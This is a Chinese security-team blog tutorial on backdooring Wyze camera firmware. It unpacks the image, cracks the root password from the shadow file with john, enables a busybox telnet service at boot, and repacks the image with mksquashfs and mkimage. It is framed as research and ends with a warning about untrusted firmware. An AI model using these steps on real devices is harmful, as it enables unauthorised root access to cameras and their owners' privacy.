点击蓝字

关注我们

声明

本文作者：GitCloud

本文字数：1000

阅读时长：10分钟

附件/链接：点击查看原文下载

声明：请勿用作违法用途，否则后果自负

本文属于WgpSec原创奖励计划，未经许可禁止转载

前言

在现代生活中，IOT的身影无处不在。我们今天就来看一下怎么制作一个摄像头恶意固件，由于我们没有该设备，所以无法为大家实体演示，后期文章中将会给大家展现其他IOT设备效果。提示一下，本文仅供安全研究，不得用于非法用途。

一、

制作摄像头恶意固件

该固件是wyze摄像头固件，固件版本是demo_v2_4.9.5.36

首先使用binwalk分析一下固件

binwalk -t demo_v2_4.9.5.36.bin

第一部分uimage中，告诉了我们很多基础信息

第二部分uimage中，可以发现内涵位Linux-3.10.14

第三部分是两个squashfs文件系统(该文件系统属性是只读)

第四部分是一个jffs2文件系统

一般我们用常规的binwalk提取的方法如：binwalk -e，提取的文件不方便打包，所以可以用一个脚步来提取文件

#!/usr/bin/env python3import sysclass Firmwarepart:    def __init__(self,name,offset,size):        self.name = name        self.offset = offset        self.size = sizefirmware_parts = [    Firmwarepart("uimage_header",0x0,0x40),    Firmwarepart("uimage_kernel",0x40,0x200000),    Firmwarepart("squashfs_1",0x200040,0x350000),    Firmwarepart("squashfs_2",0x550040,0xa0000),    Firmwarepart("jffs2",0x5F0040,11075648-0x5F0040)]if sys.argv[1] == 'unpack':    f = open(sys.argv[2],"rb")    for part in firmware_parts:        outfile = open(part.name,"wb")        f.seek(part.offset,0)        data = f.read(part.size)        outfile.write(data)        outfile.close()        print(f"Wrote {part.name} - {hex(len(data))} bytes.")

二、

运行

python3 root_extractor.py unpack demo_v2_4.9.5.36.bin

对于squashFS文件系统的提取，使用unsquashfs来实现：

unsquashfs -d squashfs_1_out squashfs_1unsquashfs -d squashfs_2_out squashfs_2

对于jff2文件系统的提取，使用jefferson实现：

jefferson -d jffs2_out jffs2

将文件提取完成后，检查所提取文件中的敏感信息

shadow文件如下

通过john进行爆破出来该root密码

john --fork=4 shadow

当我们知道root密码时，如果开启了ssh服务，我们就可以通过ssh登陆到主机

这里我们找一下系统启动项：

vi etc/init.d/rcs

可以看到系统在启动时是启动了telnet服务，但是实际上telnet服务通过端口扫描发现并未启动

在解包后的固件里直接搜索

grep -r telnet .

strings ./jffs2_out/fs_1/bin/iCamera | grep telnet

可以发现在icamera文件里，Telnet服务被禁用掉了

实际上，在该摄像头里Telnet服务实际上为busybox中的Telnet，我需要找到启动脚本，然后将其修改为：

busybox telnetf &

该脚本在squashfs_1_out/etc/init.d/rc中

vim squashfs_1_out/etc/init.d/rcS

该完之后这个服务就不会被kill掉了，接下来我们要将这几个文件系统重新打包并生成固件。

使用unsquashfs查看一下原来的文件系统信息：

unsquashfs -s squashfs_1

接下来使用mksquashfs命令将更改后的新文件系统打包

mksquashfs squashfs_1_out/ squashfs_1_new -comp xz -b 131072

再将之前的程序加上一个打包功能，这样就可以把这个两个squashfs文件系统和jffs文件系统打包起来

python3 root_extractor.py  pack demo_backdoored.bin

这样我们仅仅将文件系统打包，至于生成镜像的uImage header部分我们使用其他工具，先使用binwalk 查看一下

binwalk -t uimage_header

接下来使用mkimage来生成镜像

mkimage -A MIPS -O linux -T firmware -C none -a 0 -e 0 -n jz_fw -d demo_backdoored.bin demo_images.bin

再用binwalk查看demo_images.bin

binwalk -t demo_images.bin

可以看到我们生成的镜像和之前几乎相同

将该固件应用于摄像头中我们就可以实现用root账号登录管理摄像通了

参考

https://www.youtube.com/watch?v=hV8W4o-Mu2o

后记

所以大家在使用IOT设备的时候一定要注意固件来源，不要图方便就去网盘或下载站下载。

团队招收 IOT/二进制/免杀 安全研究的同学~

有想法的简历砸 admin@wgpsec.org

预告下，月底12.31日 是团队成立六周年的纪念日，将会有活动哦~

扫描关注公众号回复加群

和师傅们一起讨论研究~

长

按

关

注

WgpSec狼组安全团队

微信号：wgpsec

Twitter：@wgpsec